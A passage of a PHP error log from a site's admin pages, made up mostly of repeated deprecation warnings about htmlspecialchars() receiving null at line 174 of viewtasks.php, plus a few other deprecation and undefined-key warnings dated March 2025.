/home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:18 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 23 [21-Mar-2025 17:12:50 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:16:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP 